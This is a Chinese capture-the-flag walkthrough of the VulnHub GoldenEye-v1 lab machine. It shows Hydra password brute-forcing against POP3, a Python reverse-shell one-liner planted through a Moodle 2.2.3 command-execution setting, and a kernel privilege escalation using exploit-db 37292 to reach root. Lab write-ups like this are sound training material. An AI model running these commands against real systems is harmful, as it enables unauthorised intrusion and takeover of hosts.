vulnhub GoldenEye-v1实战 – 作者:umbrella1CE

靶机下载地址为：https://www.vulnhub.com/entry/goldeneye-1,240/
本次的靶机ip为192.168.3.11（桥接模式自动获取）

一、信息搜集：

1.扫描ip

发现靶机ip为192.168.3.11

2.使用nmap进行扫描端口

发现其中有一个是网站 其余三个是与邮件协议相关的端口

nmap -sS -Pn 1-65535 192.168.3.11
Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-03 22:38 CST
Failed to resolve "1-65535".
Nmap scan report for 192.168.3.11
Host is up (0.00022s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE
25/tcp open  smtp
80/tcp open  http
MAC Address: 08:00:27:8D:40:BE (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.07 seconds
ice:bp 2 ice$ nmap -p- -A 192.168.3.11
Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-03 22:41 CST
Nmap scan report for 192.168.3.11
Host is up (0.00025s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE     VERSION
25/tcp    open  smtp        Postfix smtpd
|_smtp-commands: ubuntu, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
| ssl-cert: Subject: commonName=ubuntu
| Not valid before: 2018-04-24T03:22:34
|_Not valid after:  2028-04-21T03:22:34
|_ssl-date: TLS randomness does not represent time
80/tcp    open  http        Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: GoldenEye Primary Admin Server
55006/tcp open  ssl/unknown
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2018-04-24T03:23:52
|_Not valid after:  2028-04-23T03:23:52
|_ssl-date: TLS randomness does not represent time
55007/tcp open  unknown

3.扫目录：

http://192.168.3.11/index.html (CODE:200|SIZE:252)
 http://192.168.3.11/server-status (CODE:403|SIZE:292)

4.相关信息：

Web 服务器
Apache 2.4.7
操作系统
Ubuntu

二、进行getshell

1.发现线索js文件

访问80端口发现用户名和密码但是都是未知所以我们现在需要找到密码，第一个思路就是查看源代码，果不其然发现有一个js文件，进行访问：
里面有一个用户名和密码 似乎是进行了html实体化编码 依次进行解码。

2.解码一波

得出密码是InvincibleHack3r

3.进行登录

开始我用谷歌尽然访问不了 神奇…. 进行登录首页提示的页面发现不成功(这里也可以进行爆破密码随机生成，通过crunch工具)，之后换了小写试了一下登录成功！！！：
用户名boris 密码InvincibleHack3r

4.从pop3电子邮件服务器进行入手

访问首页如下：意思大概是高pop3运行在高端口我们一会可以试试hydra(九头蛇)破解，端口为55007

5.查看他的源码：

view-source:http://192.168.3.11/sev-home/翻到最下面发现这个可能是他的账号：
Natalya\Boris

6.使用九头蛇进行爆破

既然已经知道了账户名那我们现在就利用最高端口进行爆破，这里我们使用系统自带的字典进行爆破，命令为：

hydra 192.168.3.11 -s 55007 pop3 -L user.txt -P /usr/share/wordlists/fasttrack.txt -v

成功破解！！！

继续破解第二个用户

hydra -l boris -P /usr/share/wordlists/fasttrack.txt 192.168.3.11 -s 55007 pop3

成功爆破！！
账户名为boris 密码为secret1!
两条信息都破解成功了：

• [55007] [pop3]主机：192.168.3.11登录名：natalya密码：bird

• [55007] [pop3]主机：192.168.3.11登录：Boris密码：secret1！

7.使用账户密码查看邮箱

既然已经知道了用户名和密码，那么我们现在可以使用nc登录第一个邮箱进行查看：

nc 192.168.3.11 55007
+OK GoldenEye POP3 Electronic-Mail System
user boris
+OK
pass secret1!
+OK Logged in.
list
+OK 3 messages:
1 544
2 373
3 921
.
retr 1
+OK 544 octets
Return-Path: <[email protected]>
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from ok (localhost [127.0.0.1])
	by ubuntu (Postfix) with SMTP id D9E47454B1
	for <boris>; Tue, 2 Apr 1990 19:22:14 -0700 (PDT)
Message-Id: <20180425022326.D9E47454B1@ubuntu>
Date: Tue, 2 Apr 1990 19:22:14 -0700 (PDT)
From: [email protected]

Boris, this is admin. You can electronically communicate to co-workers and students here. I'm not going to scan emails for security risks because I trust you and the other admins here.
.
retr 2
+OK 373 octets
Return-Path: <natalya@ubuntu>
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from ok (localhost [127.0.0.1])
	by ubuntu (Postfix) with ESMTP id C3F2B454B1
	for <boris>; Tue, 21 Apr 1995 19:42:35 -0700 (PDT)
Message-Id: <20180425024249.C3F2B454B1@ubuntu>
Date: Tue, 21 Apr 1995 19:42:35 -0700 (PDT)
From: natalya@ubuntu

Boris, I can break your codes!

retr 3
+OK 921 octets
Return-Path: <[email protected]>
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from janus (localhost [127.0.0.1])
	by ubuntu (Postfix) with ESMTP id 4B9F4454B1
	for <boris>; Wed, 22 Apr 1995 19:51:48 -0700 (PDT)
Message-Id: <20180425025235.4B9F4454B1@ubuntu>
Date: Wed, 22 Apr 1995 19:51:48 -0700 (PDT)
From: [email protected]

Boris,

Your cooperation with our syndicate will pay off big. Attached are the final access codes for GoldenEye. Place them in a hidden file within the root directory of this server then remove from this email. There can only be one set of these acces codes, and we need to secure them for the final execution. If they are retrieved and captured our plan will crash and burn!

Once Xenia gets access to the training site and becomes familiar with the GoldenEye Terminal codes we will push to our final stages....

PS - Keep security tight or we will be compromised.


在进行查看第二个邮箱：
sudo nc 192.168.3.11 55007
+OK GoldenEye POP3 Electronic-Mail System
user natalya
+OK
pass bird
+OK Logged in.
list
+OK 2 messages:
1 631
2 1048
.
retr 1
+OK 631 octets
Return-Path: <root@ubuntu>
X-Original-To: natalya
Delivered-To: natalya@ubuntu
Received: from ok (localhost [127.0.0.1])
	by ubuntu (Postfix) with ESMTP id D5EDA454B1
	for <natalya>; Tue, 10 Apr 1995 19:45:33 -0700 (PDT)
Message-Id: <20180425024542.D5EDA454B1@ubuntu>
Date: Tue, 10 Apr 1995 19:45:33 -0700 (PDT)
From: root@ubuntu

Natalya, please you need to stop breaking boris' codes. Also, you are GNO supervisor for training. I will email you once a student is designated to you.

Also, be cautious of possible network breaches. We have intel that GoldenEye is being sought after by a crime syndicate named Janus.
.
retr 2
+OK 1048 octets
Return-Path: <root@ubuntu>
X-Original-To: natalya
Delivered-To: natalya@ubuntu
Received: from root (localhost [127.0.0.1])
	by ubuntu (Postfix) with SMTP id 17C96454B1
	for <natalya>; Tue, 29 Apr 1995 20:19:42 -0700 (PDT)
Message-Id: <20180425031956.17C96454B1@ubuntu>
Date: Tue, 29 Apr 1995 20:19:42 -0700 (PDT)
From: root@ubuntu

Ok Natalyn I have a new student for you. As this is a new system please let me or boris know if you see any config issues, especially is it's related to security...even if it's not, just enter it in under the guise of "security"...it'll get the change order escalated without much hassle :)

Ok, user creds are:

username: xenia
password: RCP90rulez!

Boris verified her as a valid contractor so just create the account ok?

And if you didn't have the URL on outr internal Domain: severnaya-station.com/gnocertdir
**Make sure to edit your host file since you usually work remote off-network....

Since you're a Linux user just point this servers IP to severnaya-station.com in /etc/hosts.

8.绑定host文件

查看了两个用户的邮件 在第二个邮件中发现线索：网站用户名和密码 ，并最后一行提示要绑定一下本机的host文件 ，现在进行绑定：
username: xenia
password: RCP90rulez!

绑定之后进行访问：severnaya-station.com/gnocertdir输入刚刚的用户名和密码。

9.得到用户信息

访问这个网址可以查看信息获取另一位用户的用户名：doak我们这里既然知道了这个用户 那么可以试试九头蛇进行爆破：http://severnaya-station.com/gnocertdir/message/index.php?viewing=unread&user2=5

10.继续用九头蛇进行爆破

命令为：

hydra 192.168.3.11 -s 55007 pop3 -l“ doak” -P /usr/share/wordlists/fasttrack.txt -v

成功破解！！！

11.进行登录

sudo nc 192.168.3.11 55007
+OK GoldenEye POP3 Electronic-Mail System
user doak
+OK
pass goat
+OK Logged in.
list
+OK 1 messages:
1 606
.
retr
-ERR There's no message 0.
retr 1
+OK 606 octets
Return-Path: <doak@ubuntu>
X-Original-To: doak
Delivered-To: doak@ubuntu
Received: from doak (localhost [127.0.0.1])
	by ubuntu (Postfix) with SMTP id 97DC24549D
	for <doak>; Tue, 30 Apr 1995 20:47:24 -0700 (PDT)
Message-Id: <20180425034731.97DC24549D@ubuntu>
Date: Tue, 30 Apr 1995 20:47:24 -0700 (PDT)
From: doak@ubuntu

James,
If you're reading this, congrats you've gotten this far. You know how tradecraft works right?

Because I don't. Go to our training site and login to my account....dig until you can exfiltrate further information......

username: dr_doak
password: 4England!

查看信息我们得到一个用户名和密码 上面提示在培训网站进行登录：
username: dr_doak
password: 4England!

12.发现可疑文件

登陆进去之后在这块有一个可疑文件进行查看：

http://severnaya-station.com/gnocertdir/user/files.php

文本内容：

007,

I was able to capture this apps adm1n cr3ds through clear txt. 

Text throughout most web apps within the GoldenEye servers are scanned, so I cannot add the cr3dentials here. 

Something juicy is located here: /dir007key/for-007.jpg

Also as you may know, the RCP-90 is vastly superior to any other weapon and License to Kill is the only way to play.

进行查看：（这里是一张图片可以采用工具进行查看 或者直接下载查看图片的内容、使用exiftool工具也能更清楚抛光来查看）

这里发现base64编码

13.base64进行解码

解码为：xWinter1995x!
再使用admin进行登录培训网站可以看到总共有五个用户

在进行信息搜集一波：

ip：192.168.3.11
cms：   moodle 2.2.3
cms域名： http://severnaya-station.com/gnocertdir
web服务器： Apache 2.4.7
操作系统： Ubuntu
编程语言： PHP 5.5.9
phpinfo: http://severnaya-station.com/gnocertdir/admin/phpinfo.php
cms用户密码信息：
admin:xWinter1995x!
dr_doak:4England!
xenia:RCP90rulez!
pop3邮件服务器用户及密码：
natalya:bird
boris:secret1!
doak:goat/
192.168.1.169/sev-home登录用户名密码
boris:InvincibleHack3r

14.利用漏洞，进行修改

网上搜了一下moodle 2.2.3的漏洞有一个远程代码执行漏洞，可以利用一波：
(根据文章进行更改一下设置：Plugins-Text editors-TinyMCE，Spell engine选项修改为PSpellShell)

命令执行的位置在“设置”->“站点管理”->“服务器”->“系统路径”->“ aspell路径”在如下选项卡中，添加反弹Shell代码：
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF\_INET,socket.SOCK\_STREAM);s.connect(("192.168.3.2",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

在博客里面新建一个条目点击第三项进行监听：

成功获得shell

三、提权：

1.进入Python交换式Shell：

python -c 'import pty; pty.spawn("/bin/bash")'

2.首先查看内核版本：

Linux ubuntu 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux

找到对应漏洞：
网上搜索看到一篇老外写的Walkthrough，目标主机上不存在GCC编译，只能CC编译，所以在需要把Google Spell编译改成PSpellShell编译。

3.搜索提权脚本：

https://www.exploit-db.com/exploits/37292进行下载
搭建http服务进行EXP文件传输

python3 -m  http.server 8000

进行wget下载：

4.使用cc编译

输入gcc -v 报错说明没有gcc编译器
但是存在cc编译器，所以这里需要修改一下配置文件由于EXP里面是使用gcc编译的，所以得将37292.c中的gcc改为cc，重新下载到shell当中：

5.使用wget下载37292.c脚本到靶机的tmp目录。

用cc编译，赋予可执行权限后，运行exp。

ls
cc ice.c
a.out  ice.c  tinyspellXk5VCl
www-data@ubuntu:/tmp$ chmod +777 a.out
chmod +777 a.out
www-data@ubuntu:/tmp$ ./a.out
./a.out
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
 whoami
whoami
root

6.成功提权

我们可以看到目标计算机已经获得root访问权限，缓了一口气。
根据挑战的描述，目标是得到root权限&找到flag.txt。

cd /root
cd /root
ls -la
ls -la
total 44
drwx------  3 root root 4096 Apr 29  2018 .
drwxr-xr-x 22 root root 4096 Apr 24  2018 ..
-rw-r--r--  1 root root   19 May  3  2018 .bash_history
-rw-r--r--  1 root root 3106 Feb 19  2014 .bashrc
drwx------  2 root root 4096 Apr 28  2018 .cache
-rw-------  1 root root  144 Apr 29  2018 .flag.txt
-rw-r--r--  1 root root  140 Feb 19  2014 .profile
-rw-------  1 root root 1024 Apr 23  2018 .rnd
-rw-------  1 root root 8296 Apr 29  2018 .viminfo
# cat flag.txt
cat flag.txt
cat: flag.txt: No such file or directory
# cat .flag.txt
cat .flag.txt
Alec told me to place the codes here: 

568628e0d993b1973adc718237da6e93

If you captured this make sure to go here.....
/006-final/xvf7-flag/

大功告成！！！

来源：freebuf.com 2021-05-10 08:35:43 by: umbrella1CE